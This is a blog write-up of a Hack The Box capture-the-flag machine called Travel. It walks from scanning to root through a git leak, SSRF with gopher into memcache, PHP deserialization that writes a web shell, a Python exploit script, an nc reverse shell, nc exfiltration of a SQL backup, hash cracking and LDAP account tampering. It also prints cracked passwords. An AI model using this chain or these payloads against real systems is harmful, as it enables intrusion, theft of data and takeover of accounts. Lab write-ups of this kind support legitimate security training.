Starting Nmap 7.80 ( ) at 2020-07-05 19:52 IST
    NSE: Loaded 151 scripts for scanning.
    NSE: Script Pre-scanning.
    Initiating NSE at 19:52
    Completed NSE at 19:52, 0.00s elapsed
    Initiating NSE at 19:52
    Completed NSE at 19:52, 0.00s elapsed
    Initiating NSE at 19:52
    Completed NSE at 19:52, 0.00s elapsed
    Initiating Ping Scan at 19:52
    Scanning [4 ports]
    Completed Ping Scan at 19:52, 0.65s elapsed (1 total hosts)
    Initiating SYN Stealth Scan at 19:52
    Scanning ( [1000 ports]
    Discovered open port 22/tcp on
    Discovered open port 80/tcp on
    Discovered open port 443/tcp on
    Completed SYN Stealth Scan at 19:52, 3.76s elapsed (1000 total ports)
    Initiating Service scan at 19:52
    Scanning 3 services on (
    Completed Service scan at 19:52, 14.28s elapsed (3 services on 1 host)
    Initiating OS detection (try #1) against (
    Retrying OS detection (try #2) against (
    Retrying OS detection (try #3) against (
    Retrying OS detection (try #4) against (
    Retrying OS detection (try #5) against (
    Initiating Traceroute at 19:52
    Completed Traceroute at 19:52, 0.56s elapsed
    Initiating Parallel DNS resolution of 2 hosts. at 19:52
    Completed Parallel DNS resolution of 2 hosts. at 19:52, 0.61s elapsed
    NSE: Script scanning
    Initiating NSE at 19:52
    Completed NSE at 19:53, 14.29s elapsed
    Initiating NSE at 19:53
    Completed NSE at 19:53, 3.08s elapsed
    Initiating NSE at 19:53
    Completed NSE at 19:53, 0.00s elapsed
    Nmap scan report for (
    Host is up (0.30s latency).
    Not shown: 997 closed ports
    22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
    80/tcp  open  http     nginx 1.17.6
    | http-methods: 
    |_  Supported Methods: GET HEAD
    |_http-server-header: nginx/1.17.6
    |_http-title: Travel.HTB
    443/tcp open  ssl/http nginx 1.17.6
    | http-methods: 
    |_  Supported Methods: GET HEAD
    |_http-server-header: nginx/1.17.6
    |_http-title: Travel.HTB - SSL coming soon.
    | ssl-cert: Subject:
    | Subject Alternative Name:,,
    | Issuer:
    | Public Key type: rsa
    | Public Key bits: 2048
    | Signature Algorithm: sha256WithRSAEncryption
    | Not valid before: 2020-04-23T19:24:29
    | Not valid after:  2030-04-21T19:24:29
    | MD5:   ef0a a4c1 fbad 1ac4 d160 58e3 beac 9698
    |_SHA-1: 0170 7c30 db3e 2a93 cda7 7bbe 8a8b 7777 5bcd 0498
    No exact OS matches for host (If you know what OS is running on it, see ).
    TCP/IP fingerprint:

    Uptime guess: 34.417 days (since Mon Jun  1 09:52:43 2020)
    Network Distance: 2 hops
    TCP Sequence Prediction: Difficulty=245 (Good luck!)
    IP ID Sequence Generation: All zeros
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    TRACEROUTE (using port 111/tcp)
    1   555.47 ms
    2   555.59 ms (

    NSE: Script Post-scanning.
    Initiating NSE at 19:53
    Completed NSE at 19:53, 0.00s elapsed
    Initiating NSE at 19:53
    Completed NSE at 19:53, 0.00s elapsed
    Initiating NSE at 19:53
    Completed NSE at 19:53, 0.00s elapsed
    Read data files from: /usr/bin/../share/nmap
    OS and Service detection performed. Please report any incorrect results at .
    Nmap done: 1 IP address (1 host up) scanned in 55.62 seconds
            Raw packets sent: 1305 (64.070KB) | Rcvd: 1185 (50.866KB)


In nmap scans we know that we have 2 other domains:

  • travel.htb

First add these domains in /etc/hosts




So here I fuzzed every domain but got interesting ones from

    └──╼ #wfuzz -u -w /usr/share/wordlists/dirb/common.txt --hc 404

    Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

    * Wfuzz 2.4.5 - The Web Fuzzer                         *

    Total requests: 4614

    ID           Response   Lines    Word     Chars       Payload                                                               

    000000001:   403        7 L      9 W      154 Ch      ""                                                                    
    000000009:   200        1 L      2 W      23 Ch       ".git/HEAD"                                                           
    000000090:   404        7 L      11 W     154 Ch      "_tmp"                                                                ^C
    Finishing pending requests...

So here we know that we have to use git method to get all files

So i useed a tool here gitdumper : LINK

    └──╼ #./ ../../
    # GitDumper is part of
    # Developed and maintained by @gehaxelt from @internetwache
    # Use at your own risk. Usage might be illegal in certain circumstances. 
    # Only for educational purposes!

    [*] Destination folder does not exist
    [+] Creating ../../
    [+] Downloaded: HEAD
    [-] Downloaded: objects/info/packs
    [+] Downloaded: description
    [+] Downloaded: config
    [+] Downloaded: COMMIT_EDITMSG
    [+] Downloaded: index
    [-] Downloaded: packed-refs
    [+] Downloaded: refs/heads/master
    [-] Downloaded: refs/remotes/origin/HEAD
    [-] Downloaded: refs/stash
    [+] Downloaded: logs/HEAD
    [+] Downloaded: logs/refs/heads/master
    [-] Downloaded: logs/refs/remotes/origin/HEAD
    [-] Downloaded: info/refs
    [+] Downloaded: info/exclude
    [-] Downloaded: /refs/wip/index/refs/heads/master
    [-] Downloaded: /refs/wip/wtree/refs/heads/master
    [+] Downloaded: objects/03/13850ae948d71767aff2cc8cc0f87a0feeef63
    [-] Downloaded: objects/00/00000000000000000000000000000000000000
    [+] Downloaded: objects/b0/2b083f68102c4d62c49ed3c99ccbb31632ae9f
    [+] Downloaded: objects/ed/116c7c7c51645f1e8a403bcec44873f74208e9
    [+] Downloaded: objects/2b/1869f5a2d50f0ede787af91b3ff376efb7b039
    [+] Downloaded: objects/30/b6f36ec80e8bc96451e47c49597fdd64cee2da
    └──╼ #cd ../../

Here we have downloaded evry file from git :

    └──╼ #cat index 
                            template.phpTREE3 0

It looks like that we have some files deleted which need to be recover

So to that we simply need to use a git command

    └──╼ #git restore .
    └──╼ #ls  rss_template.php  template.php

Here we have these 2 files which we need to analyse :

Things we came to know from these files are:

Their is memcache available


Their is get parameter

    function url_get_contents ($url) {
        $url = safe($url);
        $url = escapeshellarg($url);
        $pl = "curl ".$url;
        $output = shell_exec($pl);
        return $output;

Their is directory where file is present and this directly looks like PHP serialization

    private function init(string $file, string $data)
        $this->file = $file;
        $this->data = $data;
        file_put_contents(__DIR__.'/logs/'.$this->file, $this->data);

This is place where get parameter would work

 	$url = $_SERVER['QUERY_STRING'];
	if(strpos($url, "custom_feed_url") !== false){
		$tmp = (explode("=", $url)); 	

So here we know that their is url parameter in custom_feed_url dir where it could help to get us shell

So when we visit this url :

We get response in such format :

    └──╼ #python -m SimpleHTTPServer 80
    Serving HTTP on port 80 ... - - [05/Jul/2020 22:03:03] "GET / HTTP/1.1" 200 - - - [05/Jul/2020 22:03:04] "GET /? HTTP/1.1" 200 -

now we need to use memcache , php des. , and SSRF to get rev shell

So to do that we have tool called gopher


So we will generate payload using gopher through which we can execute commands then we will triger that payload using above url parameter. After which we will be going to that file where our payload is stored and will be executing shell commands

First we will try out gopher without payload and remember to change to because simple local host will give you error as we have seen in above template file

    └──╼ #python --exploit phpmemcache

    ________              .__
    /  _____/  ____ ______ |  |__   ___________ __ __  ______
    /   \  ___ /  _ \\____ \|  |  \_/ __ \_  __ \  |  \/  ___/
    \    \_\  (  <_> )  |_> >   Y  \  ___/|  | \/  |  /\___ \
    \______  /\____/|   __/|___|  /\___  >__|  |____//____  >
            \/       |__|        \/     \/                 \/

            author: $_SpyD3r_$

    This is usable when you know Class and Variable name used by user

    Give serialization payload
    example: O:5:"Hello":0:{}   : O:5:"Hello":0:{}

    Your gopher link is ready to do SSRF : 


    After everything done, you can delete memcached item by using this payload: 



Here we can see that we have succesfully echo hello in page

So now we need to generate a payload which will store php shell executing cmd script in file and then it will save that file in log directory

So To do that we will have payload which looks like :

O:14:”TemplateHelper”:2:{s:4:”file”;s:’+str(len(file))+’:”‘+file+'”;s:4:”data”;s:31:”<?php system($_REQUEST[“cmd”]);”;}

What this payload is doing is that it is going to store php script in given file. Here file is named as liquid.php with php extension

But if you see that gopher generates spider text something in its payload whereas we need xct_4e5612ba079c530a6b1f148c0b352241 over their so tp do that we will have script like this

Whole payload looks like this :


‘O:14:”TemplateHelper”:2:{s:4:”file”;s:’+str(len(file))+’:”‘+file+'”;s:4:”data”;s:31:”<?php system($_REQUEST[“cmd”]);”;}’

Here we are adding xct part in front of this code

payload = “%0d%0aset xct_4e5612ba079c530a6b1f148c0b352241 4 0 ” + str(len(code)) + “%0d%0a” + code + “%0d%0a”

Here we are URL encoding this code

encodedpayload = urllib.quote_plus(payload).replace(“+”,”%20″).replace(“%2F”,”/”).replace(“%25″,”%”).replace(“%3A”,”:”)

Here we are adding gopher url in front of that encoded url:

return “gopher://” + encodedpayload

So whole script to do that is this:

    import requests
    import urllib

    file = "liquid.php"
    url = ""
    def payload ():
        code = 'O:14:"TemplateHelper":2:{s:4:"file";s:'+str(len(file))+':"'+file+'";s:4:"data";s:31:"<?php system($_REQUEST["cmd"]);";}'
        #md5(md5(" = 4e5612ba079c530a6b1f148c0b352241
        payload = "%0d%0aset xct_4e5612ba079c530a6b1f148c0b352241 4 0 " + str(len(code)) + "%0d%0a" +  code + "%0d%0a"
        encodedpayload = urllib.quote_plus(payload).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":")
        return "gopher://" + encodedpayload

    payload = payload()
    print "[+]payload is=:  " + payload
    print "[+] Requesting using ssrf in phpmemcache"

    ssrf_url = url+"awesome-rss/?debug=yes&custom_feed_url="+payload
    print ssrf_url
    r = requests.get(ssrf_url)

    print "[+] Its time for deserialization"
    r = requests.get(url+"awesome-rss/")
    payload_url = url + "wp-content/themes/twentytwenty/logs/"+file
    print payload_url
    while True:
        print payload_url
        r = requests.get(payload_url)
        if r.status_code == 200:

    print "[+] You are ready to go"
    print "[+] Run commands on web shell now"

After running thisb script just go to the given URL to execute command:


So after executing simple command : nc 9001 -e /bin/bash

You will get shell as this

    └──╼ #nc -lnvp 9001
    listening on [any] 9001 ...
    connect to [] from (UNKNOWN) [] 57608
    uid=33(www-data) gid=33(www-data) groups=33(www-data)

So here we have a file in /opt/wordpress/ folder which looks more suspicious.

Transfer that file to your own machine.


    nc 9003 < backup-13-04-2020.sql


    └──╼ #nc -lnvp 9003 > backup-13-04-2020.sql
    listening on [any] 9003 ...
    connect to [] from (UNKNOWN) [] 40198

After checking these files i got 2 hashes from this from last lines which I Passed to hashes.txt and run them against hashcat

    └──╼ #hashcat -m 400 -a 0 hash ../../THM/Wordlists/rockyou.txt --force
    hashcat (v5.1.0) starting...


    Approaching final keyspace - workload adjusted.  

    Session..........: hashcat
    Status...........: Exhausted
    Hash.Type........: phpass, WordPress (MD5), phpBB3 (MD5), Joomla (MD5)
    Hash.Target......: hash
    Time.Started.....: Sun Jul  5 20:58:28 2020 (1 hour, 0 mins)
    Time.Estimated...: Sun Jul  5 21:58:44 2020 (0 secs)
    Guess.Base.......: File (../../THM/Wordlists/rockyou.txt)
    Guess.Queue......: 1/1 (100.00%)
    Speed.#1.........:     4170 H/s (4.98ms) @ Accel:512 Loops:128 Thr:1 Vec:8
    Recovered........: 1/2 (50.00%) Digests, 1/2 (50.00%) Salts
    Progress.........: 28688768/28688768 (100.00%)
    Rejected.........: 0/28688768 (0.00%)
    Restore.Point....: 14344384/14344384 (100.00%)
    Restore.Sub.#1...: Salt:1 Amplifier:0-1 Iteration:8064-8192
    Candidates.#1....: $HEX[206b6d3831303838] -> $HEX[042a0337c2a156616d6f732103]

    Started: Sun Jul  5 20:58:24 2020
    Stopped: Sun Jul  5 21:58:44 2020

lynik-admin : 1stepcloser


    └──╼ #ssh lynik-admin@
    lynik-admin@'s password: 
    Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-26-generic x86_64)

    System information as of Sun 05 Jul 2020 05:12:38 PM UTC

    System load:                      0.01
    Usage of /:                       46.5% of 15.68GB
    Memory usage:                     12%
    Swap usage:                       0%
    Processes:                        203
    Users logged in:                  0
    IPv4 address for br-836575a2ebbb:
    IPv4 address for br-8ec6dcae5ba1:
    IPv4 address for docker0:
    IPv4 address for eth0:  

    Last login: Sun Jul  5 15:35:41 2020 from
    lynik-admin@travel:~$ id
    uid=1001(lynik-admin) gid=1001(lynik-admin) groups=1001(lynik-admin)
    lynik-admin@travel:~$ ls
    lynik-admin@travel:~$ cat user.txt 

Here we go with user flag

After enumerating I saw file mainly related to ldap So I went for more enumeration for ldap and got these files :

    -rw-r--r-- 1 lynik-admin lynik-admin   82 Apr 23 19:35 .ldaprc
    -rw------- 1 lynik-admin lynik-admin  861 Apr 23 19:35 .viminfo

So in these files I got BINDPW : Theroadlesstraveled
So I ran this command to get users on ldap server:
ldapsearch -x -D “cn=lynik-admin,dc=travel,dc=htb” -w Theroadlesstraveled
So here I know that i am admin of ldap so i can add modify users from ldap
So just create a small ldif file where we will be modifying commmands for user and giving it access equal to root


    dn: uid=johnny,ou=users,ou=linux,ou=servers,dc=travel,dc=htb
    changetype: modify
    replace: homeDirectory
    homeDirectory: /root
    add: objectClass
    objectClass: ldapPublicKey
    add: sshPublicKey
    sshPublicKey:  ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDgs99wAYJpE1eza90oIKZOe0TmcPXH4bzeiHArtwwbHJZFOWKLY15GO2L5s9JAiVlhn/VWEMLYM9QR+0kh4FPQXHDdb8eCtXfI6nkDIzcou0Hs3kAjpMUSgPuRhBGQcWs9o0gvsZ6kVGTZd9m0b4aXAvXa3gzxxxGJ5MCHKnj5DsKv/Xjr0/ooF6GOoQXMeRHE9KjgQNGSkjpkVcZlyMMAF1c/FcnB0q1fxnfimKGnrq4DA/a0jZN3Raj8yRIImaF7FppgGyNVc6UrvOt7D9DHg2f2eGUU/bFW5Clvcrkg3UIpdYqLMHMqknD9o8PshSiMsiS5s/8dwh3/6amM5YhMgeyoOBhJCIy8RwekI7ik014w8KeKPkwCJ6BgHUQ0mN0oftbO/aj7c38tI04BySM2zbLpVs+TSvs74qPzAI1iDcqCGWijMQJptLVHkqbYO9g4wudVo7ukcCZf2iDqS+vZEwSuae3EknGXbv0v5u4NdmAp6fyYWmrsm58FW2Ba6qk= root@liquid
    replace: userPassword
    userPassword: liquid
    replace: gidNumber
    gidNumber: 27

Here we will be changing user johnny access from low to root by allocating :

  • HOME (to give everything whatever root has access to)
  • GID 27 (to add this user in sudo group)
  • USERPASSWORD (to change password of user)
  • SSHPUBLICKEY (too add ssh publick key to authen. with our private key)

Here You have to generate SSH key in your own machine without password for better understanding and use public key in above script

Now lets run this command :

    lynik-admin@travel:~$ ldapmodify -x -D "cn=lynik-admin,dc=travel,dc=htb" -w Theroadlesstraveled -f liquid.ldif 
    modifying entry "uid=johnny,ou=users,ou=linux,ou=servers,dc=travel,dc=htb"


After that run this command on your machine

    └──╼ #chmod 600 id_rsa
    └──╼ #ssh -i id_rsa johnny@
    Creating directory '/home@TRAVEL/johnny'.
    Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-26-generic x86_64)

    System information as of Sun 05 Jul 2020 05:24:46 PM UTC

    System load:                      0.0
    Usage of /:                       46.5% of 15.68GB
    Memory usage:                     13%
    Swap usage:                       0%
    Processes:                        205
    Users logged in:                  1
    IPv4 address for br-836575a2ebbb:
    IPv4 address for br-8ec6dcae5ba1:
    IPv4 address for docker0:
    IPv4 address for eth0:  

    The programs included with the Ubuntu system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.

    Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
    applicable law.

    Last login: Sun Jul  5 16:05:06 2020 from
    To run a command as administrator (user "root"), use "sudo <command>".
    See "man sudo_root" for details.

    johnny@travel:~$ sudo whoami
    [sudo] password for johnny: 
    johnny@travel:~$ sudo cat /root/root.txt


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

Up ↑

%d bloggers like this: